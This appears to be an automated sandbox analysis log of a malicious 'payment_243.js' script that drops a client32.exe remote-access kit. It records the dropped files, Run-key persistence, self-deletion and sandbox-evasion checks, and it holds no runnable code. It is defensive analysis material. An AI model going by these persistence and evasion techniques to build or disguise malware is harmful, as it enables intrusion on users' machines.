Source:	Binary string: E:\nsmsrc\nsm\1200\1200\client32\Release\client32.pdb source: client32.exe, 00000004.00000002.670588209.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp, client32.exe, 00000004.00000000.516821762.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp, client32.exe, 00000006.00000000.529790878.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp, client32.exe, 00000006.00000002.530048197.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp, client32.exe, 00000008.00000002.547582545.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp, client32.exe, 00000008.00000000.547201521.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp, client32.exe.0.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb source: client32.exe, 00000004.00000002.671102639.0000000071610000.00000002.00000001.01000000.0000000D.sdmp, HTCTL32.DLL.0.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: client32.exe, 00000004.00000002.671142081.0000000071665000.00000002.00000001.01000000.0000000C.sdmp, client32.exe, 00000006.00000002.530337343.0000000071665000.00000002.00000001.01000000.0000000C.sdmp, client32.exe, 00000008.00000002.547879856.0000000071665000.00000002.00000001.01000000.0000000C.sdmp, pcicapi.dll.0.dr
Source:	Binary string: api-ms-win-core-localization-l1-2-0.pdb source: api-ms-win-core-localization-l1-2-0.dll.0.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: client32.exe, 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000006.00000002.530108204.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000008.00000002.547693910.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.0.dr

Source: C:\ProgramData\x225qa0\client32.exe

Code function: 4_2_11029BB0 GetTickCount,LoadLibraryA,GetProcAddress,InternetCloseHandle,SetLastError,_malloc,GetProcAddress,GetLastError,_free,_malloc,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,_free,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,HttpOpenRequestA,SetLastError,GetProcAddress,HttpSendRequestA,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,FreeLibrary,

4_2_11029BB0

Source: webmvorbisencoder.dll.0.dr	Static PE information: section name: _RDATA
Source: PCICL32.DLL.0.dr	Static PE information: section name: .hhshare

Source: C:\ProgramData\x225qa0\client32.exe	Code function: 4_2_1116FF15 push ecx; ret	4_2_1116FF28
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 6_2_6A0F0995 push ecx; ret	6_2_6A0F09A8
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 6_2_6A0E2D80 push eax; ret	6_2_6A0E2D9E
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 6_2_6A10A6AA push EF3FEFD4h; iretd	6_2_6A10A6B1
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 6_2_6A0FBF60 push ecx; ret	6_2_6A0FBF73
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 6_2_6A109CD8 pushad ; iretd	6_2_6A109CE6
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 6_2_716640A5 push ecx; ret	6_2_716640B8

Source: msvcr100.dll.0.dr

Static PE information: section name: .text entropy: 6.909044922675825

Source: C:\Windows\System32\wscript.exe	File created: C:\ProgramData\x225qa0\remcmdstub.exe	Jump to dropped file
Source: C:\Windows\System32\wscript.exe	File created: C:\ProgramData\x225qa0\pcicapi.dll	Jump to dropped file
Source: C:\Windows\System32\wscript.exe	File created: C:\ProgramData\x225qa0\install\api-ms-win-core-localization-l1-2-0.dll	Jump to dropped file
Source: C:\Windows\System32\wscript.exe	File created: C:\ProgramData\x225qa0\msvcr100.dll	Jump to dropped file
Source: C:\Windows\System32\wscript.exe	File created: C:\ProgramData\x225qa0\client32.exe	Jump to dropped file
Source: C:\Windows\System32\wscript.exe	File created: C:\ProgramData\x225qa0\TCCTL32.DLL	Jump to dropped file
Source: C:\Windows\System32\wscript.exe	File created: C:\ProgramData\x225qa0\PCICL32.DLL	Jump to dropped file
Source: C:\Windows\System32\wscript.exe	File created: C:\ProgramData\x225qa0\webmvorbisencoder.dll	Jump to dropped file
Source: C:\Windows\System32\wscript.exe	File created: C:\ProgramData\x225qa0\PCICHEK.DLL	Jump to dropped file
Source: C:\Windows\System32\wscript.exe	File created: C:\ProgramData\x225qa0\HTCTL32.DLL	Jump to dropped file
Source: C:\Windows\System32\wscript.exe	File created: C:\ProgramData\x225qa0\webmmux.dll	Jump to dropped file

Source: C:\Windows\System32\wscript.exe	File created: C:\ProgramData\x225qa0\remcmdstub.exe	Jump to dropped file
Source: C:\Windows\System32\wscript.exe	File created: C:\ProgramData\x225qa0\pcicapi.dll	Jump to dropped file
Source: C:\Windows\System32\wscript.exe	File created: C:\ProgramData\x225qa0\install\api-ms-win-core-localization-l1-2-0.dll	Jump to dropped file
Source: C:\Windows\System32\wscript.exe	File created: C:\ProgramData\x225qa0\msvcr100.dll	Jump to dropped file
Source: C:\Windows\System32\wscript.exe	File created: C:\ProgramData\x225qa0\client32.exe	Jump to dropped file
Source: C:\Windows\System32\wscript.exe	File created: C:\ProgramData\x225qa0\TCCTL32.DLL	Jump to dropped file
Source: C:\Windows\System32\wscript.exe	File created: C:\ProgramData\x225qa0\PCICL32.DLL	Jump to dropped file
Source: C:\Windows\System32\wscript.exe	File created: C:\ProgramData\x225qa0\webmvorbisencoder.dll	Jump to dropped file
Source: C:\Windows\System32\wscript.exe	File created: C:\ProgramData\x225qa0\PCICHEK.DLL	Jump to dropped file
Source: C:\Windows\System32\wscript.exe	File created: C:\ProgramData\x225qa0\HTCTL32.DLL	Jump to dropped file
Source: C:\Windows\System32\wscript.exe	File created: C:\ProgramData\x225qa0\webmmux.dll	Jump to dropped file

Source: C:\ProgramData\x225qa0\client32.exe

4_2_11128B10

Source: C:\Windows\System32\wscript.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run NULL			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run NULL			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Deletes itself after installation

Source: C:\Windows\System32\wscript.exe

File deleted: c:\users\user\desktop\payment_243.js

Jump to behavior

Source: C:\ProgramData\x225qa0\client32.exe	Code function: 4_2_11139ED0 GetCurrentThreadId,IsWindowVisible,IsWindow,IsWindowVisible,IsWindowVisible,GetForegroundWindow,EnableWindow,EnableWindow,EnableWindow,SetForegroundWindow,FindWindowA,IsWindowVisible,IsWindowVisible,IsIconic,GetForegroundWindow,SetForegroundWindow,EnableWindow,GetLastError,GetLastError,GetLastError,GetTickCount,GetTickCount,FreeLibrary,	4_2_11139ED0
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 4_2_110C1020 IsIconic,ShowWindow,BringWindowToTop,GetCurrentThreadId,	4_2_110C1020
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 4_2_11113380 IsIconic,GetTickCount,	4_2_11113380
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 4_2_110CB750 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,	4_2_110CB750
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 4_2_110CB750 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,	4_2_110CB750
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 4_2_111236E0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,	4_2_111236E0
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 4_2_111236E0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,	4_2_111236E0
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 4_2_11025A90 SetWindowPos,GetMenu,DrawMenuBar,GetMenu,DeleteMenu,UpdateWindow,IsIconic,SetTimer,KillTimer,	4_2_11025A90
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 4_2_1115BAE0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,	4_2_1115BAE0
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 4_2_1115BAE0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,	4_2_1115BAE0
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 4_2_11113FA0 IsIconic,GetTickCount,CreateRectRgn,GetClientRect,SetStretchBltMode,CreateRectRgn,GetClipRgn,OffsetRgn,GetRgnBox,SelectClipRgn,StretchBlt,SelectClipRgn,DeleteObject,StretchBlt,StretchBlt,GetWindowOrgEx,StretchBlt,GetKeyState,CreatePen,CreatePen,SelectObject,Polyline,Sleep,SelectObject,Polyline,Sleep,SelectObject,DeleteObject,DeleteObject,BitBlt,	4_2_11113FA0
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 4_2_11025EE0 IsIconic,BringWindowToTop,GetCurrentThreadId,	4_2_11025EE0
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 4_2_1115BEE0 _memset,SendMessageA,SendMessageA,ShowWindow,SendMessageA,IsIconic,IsZoomed,ShowWindow,GetDesktopWindow,TileWindows,	4_2_1115BEE0
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 4_2_110241A0 BringWindowToTop,SetWindowPos,SetWindowPos,SetWindowPos,GetWindowLongA,SetWindowLongA,GetDlgItem,EnableWindow,GetMenu,DeleteMenu,DrawMenuBar,SetWindowPos,IsIconic,UpdateWindow,SetTimer,KillTimer,	4_2_110241A0
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 4_2_11024880 _memset,_strncpy,_memset,_strncpy,IsWindow,IsIconic,BringWindowToTop,GetCurrentThreadId,	4_2_11024880

Source: C:\ProgramData\x225qa0\client32.exe

4_2_11029BB0

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\x225qa0\client32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\x225qa0\client32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Delayed program exit found

Source: C:\ProgramData\x225qa0\client32.exe

Code function: 4_2_110B86C0 Sleep,ExitProcess,

4_2_110B86C0

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\ProgramData\x225qa0\client32.exe

Window / User API: threadDelayed 8214

Jump to behavior

Source: C:\Windows\System32\wscript.exe	Dropped PE file which has not been started: C:\ProgramData\x225qa0\remcmdstub.exe	Jump to dropped file
Source: C:\Windows\System32\wscript.exe	Dropped PE file which has not been started: C:\ProgramData\x225qa0\install\api-ms-win-core-localization-l1-2-0.dll	Jump to dropped file
Source: C:\Windows\System32\wscript.exe	Dropped PE file which has not been started: C:\ProgramData\x225qa0\TCCTL32.DLL	Jump to dropped file
Source: C:\Windows\System32\wscript.exe	Dropped PE file which has not been started: C:\ProgramData\x225qa0\webmvorbisencoder.dll	Jump to dropped file
Source: C:\Windows\System32\wscript.exe	Dropped PE file which has not been started: C:\ProgramData\x225qa0\HTCTL32.DLL	Jump to dropped file
Source: C:\Windows\System32\wscript.exe	Dropped PE file which has not been started: C:\ProgramData\x225qa0\webmmux.dll	Jump to dropped file

Source: C:\ProgramData\x225qa0\client32.exe	Evaded block: after key decision	graph_4-70988
Source: C:\ProgramData\x225qa0\client32.exe	Evaded block: after key decision	graph_4-70590
Source: C:\ProgramData\x225qa0\client32.exe	Evaded block: after key decision	graph_4-71200
Source: C:\ProgramData\x225qa0\client32.exe	Evaded block: after key decision	graph_4-71431
Source: C:\ProgramData\x225qa0\client32.exe	Evaded block: after key decision	graph_4-71735

Source: C:\ProgramData\x225qa0\client32.exe

Evasive API call chain: GetLocalTime,DecisionNodes

graph_4-70729

Source: C:\ProgramData\x225qa0\client32.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_4-66395

Source: C:\ProgramData\x225qa0\client32.exe	API coverage: 6.0 %
Source: C:\ProgramData\x225qa0\client32.exe	API coverage: 0.5 %

Source: C:\Windows\System32\wscript.exe TID: 3436	Thread sleep time: -300000s >= -30000s	Jump to behavior
Source: C:\ProgramData\x225qa0\client32.exe TID: 3768	Thread sleep time: -82250s >= -30000s	Jump to behavior
Source: C:\ProgramData\x225qa0\client32.exe TID: 3772	Thread sleep time: -30200s >= -30000s	Jump to behavior
Source: C:\ProgramData\x225qa0\client32.exe TID: 3800	Thread sleep time: -540000s >= -30000s	Jump to behavior
Source: C:\ProgramData\x225qa0\client32.exe TID: 3768	Thread sleep time: -2053500s >= -30000s	Jump to behavior

Source: C:\ProgramData\x225qa0\client32.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem

Source: C:\Windows\System32\wscript.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\ProgramData\x225qa0\client32.exe	Code function: 4_2_111273E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,	4_2_111273E0
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 4_2_1102D9F4 Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,	4_2_1102D9F4
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 4_2_1102DD21 CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,	4_2_1102DD21
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 4_2_1110BD70 _memset,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,	4_2_1110BD70
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 4_2_110663B0 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,	4_2_110663B0
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 4_2_1106ABD0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,	4_2_1106ABD0
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 6_2_6A13CA9B _malloc_crt,FindClose,FindFirstFileExW,FindNextFileW,FindClose,	6_2_6A13CA9B
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 6_2_6A140B33 _wstat64,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,GetDriveTypeW,free,___loctotime64_t,free,_wsopen_s,__fstat64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,	6_2_6A140B33
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 6_2_6A140F84 _wstat32i64,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,GetDriveTypeW,free,___loctotime32_t,free,_wsopen_s,__fstat32i64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,	6_2_6A140F84
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 6_2_6A13EFE1 _stat32,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,free,___loctotime32_t,free,__wsopen_s,__fstat32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,	6_2_6A13EFE1
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 6_2_6A140702 _wstat32,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,GetDriveTypeW,free,___loctotime32_t,free,_wsopen_s,__fstat32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,	6_2_6A140702
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 6_2_6A13C775 _malloc_crt,FindClose,FindFirstFileExA,FindNextFileA,FindClose,	6_2_6A13C775
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 6_2_6A13DA38 _findfirst64i32,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findnext64i32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findfirst32i64,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findnext32i64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_seterrormode,SetErrorMode,	6_2_6A13DA38
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 6_2_6A13F8B5 _stat64i32,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,free,___loctotime64_t,free,__wsopen_s,__fstat64i32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,	6_2_6A13F8B5
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 6_2_6A13DF35 _wfindfirst32,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindnext32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindfirst64,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindnext64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindfirst64i32,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindnext64i32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindfirst32i64,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindnext32i64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,	6_2_6A13DF35
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 6_2_6A107C6D _wstat64i32,_wcspbrk,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,_errno,__doserrno,__doserrno,_errno,_invalid_parameter_noinfo,towlower,GetDriveTypeW,free,___loctotime64_t,free,_wsopen_s,__fstat64i32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,	6_2_6A107C6D
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 6_2_6A13FD86 _stat32i64,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,free,___loctotime32_t,free,__wsopen_s,__fstat32i64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,	6_2_6A13FD86
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 6_2_6A13F40B _stat64,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,free,___loctotime64_t,free,__wsopen_s,__fstat64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,	6_2_6A13F40B
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 6_2_6A13D4FF _findfirst32,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findnext32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findfirst64,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findnext64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,	6_2_6A13D4FF

Source: C:\ProgramData\x225qa0\client32.exe

Code function: 6_2_6A166C74 _resetstkoflw,VirtualQuery,GetSystemInfo,GetModuleHandleW,GetProcAddress,VirtualAlloc,VirtualProtect,

6_2_6A166C74

Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini	Jump to behavior

Source: HTCTL32.DLL.0.dr	Binary or memory string: VMware
Source: client32.exe, 00000004.00000002.671102639.0000000071610000.00000002.00000001.01000000.0000000D.sdmp	Binary or memory string: plist<T> too longp.secondQueueQueueThreadEventidata->Q.size () == 0p < ep%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlWinHttpCloseHandleWinHttpGetProxyForUrlNS247WinHttpOpenWinHttpGetIEProxyConfigForCurrentUserwinhttp.dllc != '\0'dstbufyenc.claaq*
Source: HTCTL32.DLL.0.dr	Binary or memory string: hbuf->datahttputil.c%5d000000000002004C4F4F50VirtualVMwareVIRTNETGetAdaptersInfoiphlpapi.dllcbMacAddress == MAX_ADAPTER_ADDRESS_LENGTHmacaddr.cpp,%02x%02x%02x%02x%02x%02x* Netbiosnetapi32.dll01234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZwhoa nelly, says Sherman, the Sharkhellooo nurse!kernel32.dllProcessIdToSessionId%s_L%d_%xNOT copied to diskcopied to %sAssert failed - Unhandled Exception (GPF) -
Source: HTCTL32.DLL.0.dr	Binary or memory string: plist<T> too longp.secondQueueQueueThreadEventidata->Q.size () == 0p < ep%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlWinHttpCloseHandleWinHttpGetProxyForUrlNS247WinHttpOpenWinHttpGetIEProxyConfigForCurrentUserwinhttp.dllc != '\0'dstbufyenc.cla
Source: HTCTL32.DLL.0.dr	Binary or memory string: VMWare

Source: C:\ProgramData\x225qa0\client32.exe	API call chain: ExitProcess graph end node			graph_4-66365
Source: C:\ProgramData\x225qa0\client32.exe	API call chain: ExitProcess graph end node			graph_4-66466

Source: C:\ProgramData\x225qa0\client32.exe

Code function: 4_2_11162BB7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

4_2_11162BB7

Source: C:\ProgramData\x225qa0\client32.exe

